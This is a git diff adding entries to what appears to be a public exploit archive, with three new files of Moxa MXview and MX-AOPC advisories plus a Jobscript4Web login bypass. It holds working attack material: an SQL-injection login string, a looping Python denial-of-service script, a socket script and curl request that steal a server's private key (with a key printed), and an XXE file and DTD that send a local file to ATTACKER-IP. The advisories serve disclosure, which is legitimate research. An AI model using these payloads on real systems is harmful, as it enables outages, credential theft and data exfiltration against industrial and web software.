diff --git a/files.csv b/files.csv
index 1b1ec3195..cc12d8038 100644
--- a/files.csv
+++ b/files.csv
@@ -5462,6 +5462,7 @@ id,file,description,date,author,platform,type,port
 41813,platforms/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41823,platforms/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,windows,dos,0
+41851,platforms/windows/dos/41851.txt,"Moxa MXview 2.8 - Denial of Service",2017-04-10,hyp3rlinx,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15426,6 +15427,8 @@ id,file,description,date,author,platform,type,port
 41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
 41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
 41825,platforms/windows/remote/41825.txt,"SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload",2017-04-05,hyp3rlinx,windows,remote,0
+41850,platforms/windows/remote/41850.txt,"Moxa MXview 2.8 - Private Key Disclosure",2017-04-10,hyp3rlinx,windows,remote,0
+41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37717,3 +37720,4 @@ id,file,description,date,author,platform,type,port
 41844,platforms/php/webapps/41844.html,"e107 CMS 2.1.4 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,0
 41845,platforms/php/webapps/41845.txt,"WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
 41846,platforms/php/webapps/41846.html,"WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
+41849,platforms/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,php,webapps,0
diff --git a/platforms/php/webapps/41849.txt b/platforms/php/webapps/41849.txt
new file mode 100755
index 000000000..03baa9192
--- /dev/null
+++ b/platforms/php/webapps/41849.txt
@@ -0,0 +1,20 @@
+----------------
+Title = Jobscript4Web 4.5 - Authentication Bypass
+Date = 8/4/2017
+Soft = http://www.jobscript4web.com/index.html
+liVE Demo = http://www.simplejobs.co.in/soft4u
+---------------
+AutHor = TurkCyberArmy
+---------------
+Bizler Turk siber ordusu bunyesinde goreve basladik. Dosta guven dusmana korku vermek icin geldik.
+Kendimize ait isletim sistemlerimizle, programlama dillerimizle, kendimizin gelistirdigi yazilimlarimizla artik buradayiz.
+Sanal alem kontrolumuz altindadir. Turk devletine ait tum sitelerimiz ve sistemlerimiz emin ellerdedir.
+Bilin istedik !!!
+Turk Siber Yildizlari.!
+---------------
++ Exploitation Details +
+---------------
+HTTP://Path/soft4u/
+user : ' or '2=2 password : ' or '2=2
+---------------
+
diff --git a/platforms/windows/dos/41851.txt b/platforms/windows/dos/41851.txt
new file mode 100755
index 000000000..be7ab1c78
--- /dev/null
+++ b/platforms/windows/dos/41851.txt
@@ -0,0 +1,96 @@
+[+] Credits: John Page AKA hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+============
+www.moxa.com
+
+
+
+Product:
+===========
+MXView v2.8
+
+Download:
+http://www.moxa.com/product/MXstudio.htm
+
+MXview Industrial Network Management Software.
+
+Auto discovery of network devices and physical connections
+Event playback for quick troubleshooting
+Color-coded VLAN/IGMP groups and other visualized network data
+Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.
+
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+
+CVE Reference:
+==============
+CVE-2017-7456
+
+
+
+Security Issue:
+================
+Remote attackers can DOS MXView server by sending large string of junk characters for the user ID and password field login credentials.
+
+
+
+Exploit/POC:
+=============
+import urllib,urllib2
+
+print 'Moxa MXview v2.8 web interface DOS'
+print 'hyp3rlinx'
+
+IP=raw_input("[Moxa MXView IP]>")
+
+PAYLOAD="A"*200000000
+
+url = 'http://'+IP+'/goform/account'
+data = urllib.urlencode({'uid' :  PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})
+
+while 1:
+    req = urllib2.Request(url, data)
+    res = urllib2.urlopen(req)
+    print res
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+==========================================================
+Vendor Notification:  March 5, 2017
+Vendor confirms vulnerability : March 21, 2017
+Vendor "updated firmware April 7, 2017" : March 29, 2017
+April 9, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/platforms/windows/remote/41850.txt b/platforms/windows/remote/41850.txt
new file mode 100755
index 000000000..d3d7e5705
--- /dev/null
+++ b/platforms/windows/remote/41850.txt
@@ -0,0 +1,136 @@
+[+] Credits: John Page AKA HYP3RLINX	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt
+[+] ISR: APPARITIONSEC            
+ 
+
+
+Vendor:
+============
+www.moxa.com
+
+
+
+Product:
+===========
+MXview V2.8
+
+Download:
+http://www.moxa.com/product/MXstudio.htm
+
+MXview Industrial Network Management Software.
+
+Auto discovery of network devices and physical connections
+Event playback for quick troubleshooting
+Color-coded VLAN/IGMP groups and other visualized network data
+Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.
+
+
+
+Vulnerability Type:
+=============================
+Remote Private Key Disclosure
+
+
+
+CVE Reference:
+==============
+CVE-2017-7455
+
+
+
+Security Issue:
+================
+MXview stores a copy of its web servers private key under C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key.
+Remote attackers can easily access/read this private key "mxview.key" file by making an HTTP GET request.
+
+e.g.
+
+curl -v   http://VICTIM-IP:81/certs/mxview.key
+
+
+* About to connect() to VICTIM-IP port 81
+*   Trying VICTIM-IP... connected
+* Connected to VICTIM-IP (VICTIM-IP) port 81
+> GET /certs/mxview.key HTTP/1.1
+> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 
+> Host: VICTIM-IP:81
+> Accept: */*
+>
+< HTTP/1.1 200 OK
+< Date: Tue Feb 28 14:18:00 2017
+< Server: GoAhead-Webs
+< Last-modified: Tue Feb 28 10:46:51 2017
+< Content-length: 916
+< Content-type: text/plain
+-----BEGIN PRIVATE KEY-----
+MIICdwIBADANBgkqhkiG2w0BAQEFAASCAmEwggJdAgEAAoGBAMO2BjHS6rFYqxPb
+QCjhVn5+UGwfICfETzk5JQvhkhc71bnsDHI7lVyYhheYLcPQBEglVolwGANPp7LF
+2lhG+UaSFfTVk8UDvV0qQpjSQvDjcWSuKBfceyT5zmI8ynxuMHoqBR7ZOSLY31z+
+Rxt+JCykwqfMGdjawnC5ivr8iWDpAgMBAAECgYAQpHjwYbQtcpHRtXJGR6s4RHuI
+RjlQyGPIRPC+iucGbMMm9Ui1qhVwc1Pry7gQj67dh7dNJqgUGAD1tdd0bEykKoqm
+ICgXj0HMPCLxUy4CHIZInsBhzAyp/3atkDIaeELZckCbmttkVvncDi+b9HnuL/To
+YwJpuLkpXEKpjK7iAQJBAOof+yliPn7UsBecw/Hc/ixeDRGI1kjtvuOvSi6jLZoj
+3rzODMSD1eRcrK/GJydWVT8TV3WXXYn3M1cu3kmQJKkCQQDV/zlBtFFPPVAl1zy7
+UBG+RPI63uXeaA0C1+RX2XfJSR4zeKxnWgalzUl0UwMgWB3Gpp2+VW5a/zw3aKlK
+6MJBAkBHPMXqWKdVZhfSh3Ojky+PhmqJjE5PUG/FzZ9Pw3zrqsBqSHPgE5Ewc/Zj
+YXKmavCbSaJR+GWQxjPL8knWrlJJAkEAkahnEJHrxkO1igw3Ckg0y4yiU+/kBr5M
+HONWSXV8U0WxiNdagf6FB9XzaXoXZuyTl+NQ+3yq4MVZ910F3jcQAQJBAI+q0AcX
+EskHai2Fx24gkHwwRxacsiXrRClxIj5NB52CSo2Sy6EF02DKQVWR3oIjDesXcWvl
++CPTV6agBkYxe7Q=
+-----END PRIVATE KEY-----
+
+
+
+Exploit:
+=========
+import socket
+
+print 'Moxa MXview 2.8 Remote Private Key Theft'
+print 'by hyp3rlinx\n'
+
+IP=raw_input("[Moxa MXview IP]> ")
+PORT=int(raw_input("[PORT]> "))
+STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\n\r\n"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((IP,PORT))
+s.send(STEAL_PRV_KEY)
+
+print 'Enjoy ur private server key!\n'
+print s.recv(512)
+
+s.close()
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Critical
+
+
+
+Disclosure Timeline:
+===================================
+Vendor Notification:  March 5, 2017
+Vendor confirms vulnerability : March 21, 2017
+Vendor "updated firmware April 7, 2017" : March 29, 2017
+April 9, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/platforms/windows/remote/41852.txt b/platforms/windows/remote/41852.txt
new file mode 100755
index 000000000..034aa3db1
--- /dev/null
+++ b/platforms/windows/remote/41852.txt
@@ -0,0 +1,105 @@
+[+] Credits: John Page AKA HYP3RLINX	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+============
+www.moxa.com
+
+
+
+Product:
+=======================
+MX-AOPC UA SERVER - 1.5
+
+Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation supporting both push and pull communication.
+
+
+
+Vulnerability Type:
+==============================
+XML External Entity Injection
+
+
+
+CVE Reference:
+==============
+CVE-2017-7457
+
+
+
+Security Issue:
+================
+XML External Entity via ".AOP" files used by MX-AOPC Server result in remote file disclosure. If local user opens
+a specially crafted malicious MX-AOPC Server file type.
+
+
+
+Exploit/POC:
+=============
+run MX-AOPC UA Server / Runtime / Start Server Runtime Service 
+
+a) ATTACKER SERVER LISTENER we will access Windows msfmap.ini as proof of concept
+python -m SimpleHTTPServer 8080
+
+"Evil.AOP" file
+
+<?xml version="1.0"?>  
+<!DOCTYPE roottag [ 
+<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
+<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+
+b) Evil "payload.dtd" file host on ATTACKER SERVER
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
+%all;
+
+
+e.g.
+
+python -m SimpleHTTPServer 8080
+
+Serving HTTP on 0.0.0.0 port 8080 ...
+
+VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 -
+VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect%20name]%20will%20modify%20the%20connection%20if%20ADC.connect="name";[connect%20default]%20will%20modify%20the%20connection%20if%20name%20is%20not%20found;[sql%20name]%20will%20modify%20the%20Sql%20if%20ADC.sql="name(args)";[sql%20default]%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.;Only%20the%20Sql%20strings%20support%20parameters%20using%20"?";The%20override%20strings%20must%20not%20equal%20""%20or%20they%20are%20ignored;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist%20name]%20allows%20specific%20users%20to%20have%20special%20access;The%20Access%20is%20computed%20as%20follows:;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.[connect%20default];If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccessAccess=NoAccess[sql%20default];If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.Sql="%20"[connect%20CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql%20CustomerById]Sql="SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?"[connect%20AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist%20AuthorDatabase]Administrator=ReadWrite[sql%20AuthorById]Sql="SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?" HTTP/1.1" 200 -
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+==========================================================
+Vendor Notification:  March 5, 2017
+Vendor confirms vulnerability : March 21, 2017
+Vendor "updated firmware April 7, 2017" : March 29, 2017
+April 9, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file